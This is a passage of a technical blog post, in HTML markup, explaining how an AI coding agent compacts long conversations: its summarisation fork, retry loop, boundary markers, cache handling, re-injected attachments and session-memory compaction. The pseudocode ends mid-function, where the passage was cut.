&lt;p&gt;A critical constraint: the fork must NOT set &lt;code&gt;maxOutputTokens&lt;/code&gt;. Setting it would clamp the thinking budget via a formula in the API client, creating a thinking config mismatch that invalidates the cache key. The forked agent uses the model's default output limit. Since compaction is capped at one turn (&lt;code&gt;maxTurns: 1&lt;/code&gt;), the output naturally stays within bounds.&lt;/p&gt;

&lt;p&gt;The fork also skips writing to the prompt cache (&lt;code&gt;skipCacheWrite: true&lt;/code&gt;) — its response is ephemeral and caching it would waste cache creation tokens. The fork's tool permissions are locked to deny-all (&lt;code&gt;createCompactCanUseTool&lt;/code&gt;), ensuring the model produces only text, never tool calls.&lt;/p&gt;

&lt;p&gt;If the fork fails, the system falls back to a direct streaming call with the compact-specific output cap (20K tokens). Telemetry tracks the cache hit rate to monitor effectiveness — a 98% miss rate in the fork path would cost ~0.76% of fleet-wide cache creation, concentrated in ephemeral environments with cold caches.&lt;/p&gt;

&lt;p&gt;During the summarization call, the system sends keep-alive signals every 30 seconds — a session activity signal plus a "compacting" status update. This prevents WebSocket timeouts in IDE integrations where the compaction call might take 30-60 seconds for large conversations.&lt;/p&gt;

&lt;h3&gt;
  
  
  Hooks
&lt;/h3&gt;

&lt;p&gt;The compaction system fires three hook events that users can subscribe to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PreCompact&lt;/strong&gt; — runs before summarization. Returns optional custom instructions that are merged with the user's instructions. User instructions come first, hook instructions appended.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostCompact&lt;/strong&gt; — runs after compaction completes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SessionStart&lt;/strong&gt; — runs after compaction to re-trigger initialization logic (CLAUDE.md reload, etc.).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These hooks allow plugins and IDE integrations to inject context, clear their own caches, or perform cleanup. Hook results are included in the post-compact message array as &lt;code&gt;hookResults&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Three Prompt Variants
&lt;/h3&gt;

&lt;p&gt;The system has three compaction modes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Full compact&lt;/strong&gt;: Summarize the entire conversation. Used by auto-compact and &lt;code&gt;/compact&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partial compact ("from")&lt;/strong&gt;: Summarize only messages after a selected point, preserving earlier messages. Preserves the prompt cache (early messages stay).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Partial compact ("up_to")&lt;/strong&gt;: Summarize messages before a selected point, keeping later messages. Invalidates the prompt cache (the kept messages move to the end).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The "from" variant adds: "Earlier retained messages are NOT re-summarized." The "up_to" variant changes section 8 from "Current Work" to "Work Completed" and adds "Context for Continuing Work" — since newer messages follow the summary, the summary needs to set up context rather than continue work.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Prompt-Too-Long Retry Loop
&lt;/h2&gt;

&lt;p&gt;Sometimes the conversation is so large that the compaction request itself exceeds the context window. The system handles this with a retry loop:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;attempt&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="mf"&gt;1.&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;MAX_PTL_RETRIES &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;stream&lt;/span&gt; &lt;span class="n"&gt;summary&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;
  &lt;span class="n"&gt;catch&lt;/span&gt; &lt;span class="n"&gt;PromptTooLong&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;messages&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;truncateHeadForPTLRetry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;errorResponse&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;null&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
      &lt;span class="n"&gt;throw&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Conversation too long. Press esc twice to go up a few messages and try again.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;truncateHeadForPTLRetry&lt;/code&gt; groups messages by API round (one group per model response with its tool results). It calculates how many tokens to drop based on the error response's token gap. If the gap is unparseable (some Vertex/Bedrock error formats), it falls back to dropping 20% of groups. It drops the oldest groups first.&lt;/p&gt;

&lt;p&gt;A subtle self-referential bug was fixed: the function strips its own synthetic marker from a previous retry before grouping. Otherwise the marker becomes its own group at index 0, and the 20% fallback stalls — it drops only the marker, re-adds it on the next retry, and makes zero progress. The fix checks if the first message is the marker (by content match and &lt;code&gt;isMeta&lt;/code&gt; flag) and strips it before grouping.&lt;/p&gt;

&lt;p&gt;If the truncated messages would start with an assistant message (violating the API's alternation requirement), a synthetic user message is prepended: &lt;code&gt;[earlier conversation truncated for compaction retry]&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;If ALL groups would need to be dropped (nothing left to summarize), the function returns null and the user sees an error message suggesting they press Escape to go back a few messages.&lt;/p&gt;
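&lt;p&gt;As a sketch, the whole truncation step might look like the following. The names, message shapes, and grouping rule are illustrative assumptions (here a round simply starts at each user message; the real grouping keys on model responses with their tool results):&lt;/p&gt;

```python
# Hypothetical sketch of the PTL head-truncation step; not the real code.
TRUNCATION_MARKER = "[earlier conversation truncated for compaction retry]"
FALLBACK_DROP_FRACTION = 0.2

def group_by_round(messages):
    # One group per API round. Illustrative: a round starts at each user
    # message; the real grouping keys on model responses + tool results.
    groups = []
    for m in messages:
        if m["role"] == "user" or not groups:
            groups.append([])
        groups[-1].append(m)
    return groups

def truncate_head_for_ptl_retry(messages, drop_tokens=None):
    # Strip our own marker from a previous retry so it does not become
    # group 0 and stall the 20% fallback.
    if messages and messages[0].get("meta") and messages[0]["content"] == TRUNCATION_MARKER:
        messages = messages[1:]

    groups = group_by_round(messages)
    if drop_tokens is not None:
        # Drop oldest groups until the error's token gap is covered.
        drop, covered = 0, 0
        while drop < len(groups) and covered < drop_tokens:
            covered += sum(m.get("tokens", 0) for m in groups[drop])
            drop += 1
    else:
        # Token gap unparseable (some Vertex/Bedrock formats): drop 20%.
        drop = max(1, int(len(groups) * FALLBACK_DROP_FRACTION))

    if drop >= len(groups):
        return None  # nothing left to summarize; caller surfaces the error

    kept = [m for g in groups[drop:] for m in g]
    if kept[0]["role"] == "assistant":
        # Restore the API's user/assistant alternation.
        kept.insert(0, {"role": "user", "content": TRUNCATION_MARKER, "meta": True})
    return kept
```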

&lt;h2&gt;
  
  
  Post-Compact: What Survives the Boundary
&lt;/h2&gt;

&lt;p&gt;After summarization, the old messages are replaced wholesale. The new message array is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="p"&gt;[&lt;/span&gt;
  &lt;span class="nx"&gt;boundaryMarker&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// System message marking the compaction point&lt;/span&gt;
  &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;summaryMessages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c1"&gt;// The formatted summary as a user message&lt;/span&gt;
  &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;messagesToKeep&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;     &lt;span class="c1"&gt;// Preserved messages (partial compact only)&lt;/span&gt;
  &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;attachments&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// Re-injected context&lt;/span&gt;
  &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;hookResults&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;        &lt;span class="c1"&gt;// User hook output&lt;/span&gt;
&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  The Boundary Marker
&lt;/h3&gt;

&lt;p&gt;A system message that records metadata about the compaction:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;trigger&lt;/strong&gt;: "manual" (user ran &lt;code&gt;/compact&lt;/code&gt;) or "auto" (threshold exceeded)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;preTokens&lt;/strong&gt;: token count before compaction (for analytics)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;messagesSummarized&lt;/strong&gt;: how many messages were replaced&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;logicalParentUuid&lt;/strong&gt;: UUID of the last pre-compact message (enables fork/rewind to find the original conversation)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;preCompactDiscoveredTools&lt;/strong&gt;: tool names seen before compaction (for re-announcing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;preservedSegment&lt;/strong&gt;: head/anchor/tail UUIDs (for partial compact message relinking)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The boundary is the anchor point. Everything before it is gone (replaced by the summary). Everything after it is the new conversation.&lt;/p&gt;
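&lt;p&gt;The metadata above could be modeled as a simple record. Only the field names come from the text; the types and defaults are assumptions:&lt;/p&gt;

```python
from dataclasses import dataclass, field
from typing import Optional

# Illustrative shape for the compact-boundary metadata; not the real type.
@dataclass
class CompactBoundary:
    trigger: str                      # "manual" (/compact) or "auto" (threshold)
    pre_tokens: int                   # token count before compaction (analytics)
    messages_summarized: int          # how many messages were replaced
    logical_parent_uuid: str          # last pre-compact message (fork/rewind anchor)
    pre_compact_discovered_tools: list = field(default_factory=list)
    preserved_segment: Optional[dict] = None  # head/anchor/tail UUIDs (partial compact)
```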

&lt;h3&gt;
  
  
  Cache Break Detection
&lt;/h3&gt;

&lt;p&gt;After compaction, the prompt cache baseline is stale. The token count drops legitimately — old messages were replaced with a shorter summary. Without intervention, the cache break detection system would see the drop in &lt;code&gt;cache_read_input_tokens&lt;/code&gt; and flag a "cache break" warning.&lt;/p&gt;

&lt;p&gt;The fix: &lt;code&gt;notifyCompaction()&lt;/code&gt; resets the previous cache read baseline to null. The next API call establishes a fresh baseline. The detection system compares subsequent calls against this new baseline, ignoring the compaction-induced drop.&lt;/p&gt;

&lt;p&gt;The cache break detector itself uses dual thresholds: a drop must be both &amp;gt;5% of the previous cache read AND &amp;gt;2,000 tokens to be flagged. Small fluctuations from server-side cache management are ignored.&lt;/p&gt;
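&lt;p&gt;A minimal sketch of this detector, assuming a small stateful class (the 5% and 2,000-token constants come from the text; the class shape and method names are assumptions):&lt;/p&gt;

```python
# Illustrative dual-threshold cache-break detector; not the real code.
class CacheBreakDetector:
    REL_THRESHOLD = 0.05      # drop must exceed 5% of previous cache read...
    ABS_THRESHOLD = 2_000     # ...AND exceed 2,000 tokens

    def __init__(self):
        self.prev_cache_read = None

    def notify_compaction(self):
        # Compaction legitimately shrinks the prompt; forget the baseline
        # so the next API call establishes a fresh one.
        self.prev_cache_read = None

    def observe(self, cache_read_tokens):
        broke = False
        if self.prev_cache_read is not None:
            drop = self.prev_cache_read - cache_read_tokens
            broke = (drop > self.prev_cache_read * self.REL_THRESHOLD
                     and drop > self.ABS_THRESHOLD)
        self.prev_cache_read = cache_read_tokens
        return broke
```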

&lt;h3&gt;
  
  
  Re-Injected Attachments
&lt;/h3&gt;

&lt;p&gt;The system generates attachments in parallel to restore context that the summary might have compressed too aggressively:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Recently-read files&lt;/strong&gt; — The 5 most recently accessed files are re-read with fresh content (not cached — the file may have changed since it was first read). Each file is capped at 5,000 tokens, with a total budget of 50,000 tokens. Plan files and memory files (CLAUDE.md) are excluded — they have their own injection paths via the system prompt.&lt;/p&gt;

&lt;p&gt;The file selection uses recency ordering from the file read state tracker. Files already present in preserved messages (partial compact) are skipped to avoid duplication. The deduplication scans preserved messages for Read tool_use blocks and collects their file paths. It also skips files that had the "FILE_UNCHANGED" stub (a deduplication marker that points at an earlier full read of the same file).&lt;/p&gt;

&lt;p&gt;Each file is re-read via the actual File Read tool at restoration time. This means the restored content reflects the file's CURRENT state, not its state when it was first read. If the model edited a file 30 turns ago and the file was later modified by other tools, the post-compact restoration shows the latest version.&lt;/p&gt;
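&lt;p&gt;The selection logic can be sketched as a budgeted filter. The caps (5 files, 5,000 tokens each, 50,000 total) come from the text; the function name and input shapes are assumptions:&lt;/p&gt;

```python
# Hypothetical sketch of the recently-read-file restoration budget.
MAX_FILES = 5
PER_FILE_TOKEN_CAP = 5_000
TOTAL_TOKEN_BUDGET = 50_000

def select_files_to_restore(recent_files, preserved_paths, excluded_paths):
    """recent_files: (path, estimated_tokens) pairs, most-recent-first."""
    selected, spent = [], 0
    for path, est in recent_files:
        if len(selected) == MAX_FILES:
            break
        if path in preserved_paths or path in excluded_paths:
            # Already in kept messages (partial compact), or a plan/memory
            # file with its own injection path.
            continue
        cost = min(est, PER_FILE_TOKEN_CAP)  # each file capped at 5K tokens
        if spent + cost > TOTAL_TOKEN_BUDGET:
            continue
        selected.append(path)
        spent += cost
    return selected
```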

&lt;p&gt;&lt;strong&gt;Active skills&lt;/strong&gt; — Skills invoked during the session are preserved, sorted most-recent-first. Each skill is capped at 5,000 tokens (truncated with a marker telling the model it can re-read the full content). Total budget: 25,000 tokens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plan file&lt;/strong&gt; — If a plan exists for the current session, it's re-injected as an attachment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Plan mode&lt;/strong&gt; — If the user is currently in plan mode, an attachment ensures the model continues in plan mode after compaction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Async agent status&lt;/strong&gt; — Background agents that are still running or recently finished get status attachments. This prevents the model from spawning duplicate agents after losing the original creation context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tool deltas&lt;/strong&gt; — The full tool set is re-announced. After compaction, the model needs to know what tools are available — the original tool announcements from earlier in the conversation are gone.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;MCP instructions&lt;/strong&gt; — Model Context Protocol tool instructions are re-injected for any MCP servers with deferred tool loading.&lt;/p&gt;

&lt;h3&gt;
  
  
  Post-Compact Cleanup
&lt;/h3&gt;

&lt;p&gt;After compaction, 10+ caches are cleared because their contents reference pre-compact state:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Microcompact tracking state (tool IDs no longer valid)&lt;/li&gt;
&lt;li&gt;User context cache (forces CLAUDE.md reload and InstructionsLoaded hook)&lt;/li&gt;
&lt;li&gt;Memory file cache (allows fresh memory file detection)&lt;/li&gt;
&lt;li&gt;System prompt sections (may reference pre-compact state)&lt;/li&gt;
&lt;li&gt;Classifier approvals (permissions may have changed)&lt;/li&gt;
&lt;li&gt;Bash permission speculative checks (stale command analysis)&lt;/li&gt;
&lt;li&gt;Session messages cache (old messages gone)&lt;/li&gt;
&lt;li&gt;Beta tracing state&lt;/li&gt;
&lt;li&gt;File content cache (for commit attribution)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The cleanup is careful about main-thread vs. subagent scope. Subagents run in the same process and share module-level state with the main thread. Clearing state during a subagent compaction would corrupt the main thread. The cleanup checks the query source prefix (&lt;code&gt;repl_main_thread&lt;/code&gt; or &lt;code&gt;sdk&lt;/code&gt;) before resetting shared state.&lt;/p&gt;
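&lt;p&gt;An illustrative guard for that scope check, assuming caches expose a &lt;code&gt;clear()&lt;/code&gt; method (the prefix strings come from the text; everything else is a sketch):&lt;/p&gt;

```python
# Hypothetical cleanup guard: shared module-level caches are only reset
# when the compaction belongs to the main thread or SDK, never during a
# subagent's compaction.
MAIN_SCOPE_PREFIXES = ("repl_main_thread", "sdk")

def post_compact_cleanup(query_source, shared_caches, local_caches):
    for cache in local_caches:
        cache.clear()  # per-query state is always safe to drop
    if query_source.startswith(MAIN_SCOPE_PREFIXES):
        for cache in shared_caches:
            cache.clear()  # module-level state shared with subagents
```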

&lt;p&gt;One deliberate non-clear: the set of sent skill names. Re-injecting the full skill listing post-compact costs ~4,000 tokens of pure cache creation. The model still has the skill tool in its schema, and the invoked_skills attachment preserves content for used skills. Skipping re-injection saves tokens on every compaction.&lt;/p&gt;

&lt;h2&gt;
  
  
  Auto-Compact Orchestration
&lt;/h2&gt;

&lt;p&gt;The auto-compact flow ties everything together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;autoCompactIfNeeded&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;consecutiveFailures&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="k"&gt;return &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;circuit&lt;/span&gt; &lt;span class="nx"&gt;breaker&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nf"&gt;shouldAutoCompact&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt;

  &lt;span class="c1"&gt;// Try session memory compaction first (cheap, no model call)&lt;/span&gt;
  &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;trySessionMemoryCompaction&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;success&lt;/span&gt;

  &lt;span class="c1"&gt;// Fall back to full compaction (expensive, model call)&lt;/span&gt;
  &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;compactConversation&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;suppressFollowUpQuestions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;isAutoCompact&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;reset&lt;/span&gt; &lt;span class="nx"&gt;failures&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;success&lt;/span&gt;

  &lt;span class="c1"&gt;// Failure: increment circuit breaker&lt;/span&gt;
  &lt;span class="nx"&gt;consecutiveFailures&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;consecutiveFailures&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;log&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;circuit breaker tripped&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When auto-compact triggers, it suppresses follow-up questions. The model receives: "Continue without asking user further questions. Resume directly — do not acknowledge summary, do not recap, do not preface. Pick up last task as if break never happened." This prevents the jarring experience of the model suddenly asking "Would you like me to continue?" mid-task.&lt;/p&gt;

&lt;p&gt;In autonomous/proactive mode, the continuation message is even stronger: "You are running in autonomous mode. This is NOT first wake-up. Continue work loop — pick up where you left off. Do not greet or ask what to work on."&lt;/p&gt;

&lt;p&gt;For manual &lt;code&gt;/compact&lt;/code&gt;, the user can provide custom instructions (e.g., "focus on the authentication work") that are appended to the summarization prompt.&lt;/p&gt;

&lt;h3&gt;
  
  
  Recompaction Tracking
&lt;/h3&gt;

&lt;p&gt;The system tracks compaction chains — situations where auto-compact fires, the conversation grows past the threshold again, and auto-compact fires a second time. Each compaction records:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Whether this is a recompaction in a chain&lt;/li&gt;
&lt;li&gt;Turns since the previous compaction&lt;/li&gt;
&lt;li&gt;The previous compaction's turn ID&lt;/li&gt;
&lt;li&gt;The auto-compact threshold that triggered it&lt;/li&gt;
&lt;li&gt;The query source that was active when triggered&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This metadata feeds into telemetry for monitoring compaction quality. If compaction produces summaries that are too verbose (consuming too many tokens), the conversation will recompact quickly — a signal that the summarization prompt needs tuning.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tier 3: Session Memory Compact
&lt;/h2&gt;

&lt;p&gt;Full compaction is expensive — it sends the entire conversation to the model and waits for a summary. Session memory compaction is an experimental alternative that skips the model call entirely.&lt;/p&gt;

&lt;h3&gt;
  
  
  How Session Memory Works
&lt;/h3&gt;

&lt;p&gt;Throughout the conversation, a background process periodically extracts "session memory" — a structured markdown file with sections like Current State, Task Specification, Files and Functions, Errors &amp;amp; Corrections, and a Worklog.&lt;/p&gt;

&lt;p&gt;The extraction triggers based on two conditions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;trigger&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tokenGrowth&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;minimumTokensBetweenUpdate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
          &lt;span class="nc"&gt;AND &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;toolCalls&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;toolCallsBetweenUpdates&lt;/span&gt; &lt;span class="n"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;noToolCallsInLastTurn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
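&lt;p&gt;As a runnable restatement of that predicate (the threshold values here are placeholders, not the real configuration):&lt;/p&gt;

```python
# Illustrative trigger predicate; constants are placeholder assumptions.
MIN_TOKENS_BETWEEN_UPDATES = 4_000
TOOL_CALLS_BETWEEN_UPDATES = 10

def should_extract(token_growth, tool_calls_since_update, last_turn_had_tool_calls):
    # Extract when enough new tokens accumulated AND either enough tool
    # calls happened or the last turn made no tool calls at all.
    return (token_growth >= MIN_TOKENS_BETWEEN_UPDATES
            and (tool_calls_since_update >= TOOL_CALLS_BETWEEN_UPDATES
                 or not last_turn_had_tool_calls))
```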



&lt;p&gt;The extraction runs in a forked subagent — isolated from the main conversation, using the API's cache-safe parameters to avoid polluting the main prompt cache. The forked agent can ONLY use the file edit tool, and only on the session memory file. It reads the current notes, the recent conversation, and updates the file.&lt;/p&gt;

&lt;p&gt;Section sizes are enforced: 2,000 tokens per section, 12,000 tokens total. If a section exceeds its limit, the extraction prompt includes a reminder to condense. This prevents the session memory file from growing without bound.&lt;/p&gt;

&lt;h3&gt;
  
  
  Using Session Memory for Compaction
&lt;/h3&gt;

&lt;p&gt;When auto-compact triggers, it tries session memory compaction first:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;trySessionMemoryCompaction&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;feature&lt;/span&gt; &lt;span class="nx"&gt;disabled&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="nx"&gt;memory&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt; &lt;span class="nx"&gt;memory&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;empty&lt;/span&gt; &lt;span class="nx"&gt;template&lt;/span&gt; &lt;span class="err"&gt;→&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;

  &lt;span class="nx"&gt;wait&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;any&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;progress&lt;/span&gt; &lt;span class="nx"&gt;extraction&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nx"&gt;complete&lt;/span&gt;

  &lt;span class="nx"&gt;calculate&lt;/span&gt; &lt;span class="nx"&gt;which&lt;/span&gt; &lt;span class="nx"&gt;messages&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nf"&gt;keep &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;most&lt;/span&gt; &lt;span class="nx"&gt;recent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;meeting&lt;/span&gt; &lt;span class="nx"&gt;minimum&lt;/span&gt; &lt;span class="nx"&gt;thresholds&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="nx"&gt;adjust&lt;/span&gt; &lt;span class="nx"&gt;keep&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nx"&gt;preserve&lt;/span&gt; &lt;span class="nx"&gt;API&lt;/span&gt; &lt;span class="nf"&gt;invariants &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool_use&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="nx"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;thinking&lt;/span&gt; &lt;span class="nx"&gt;blocks&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

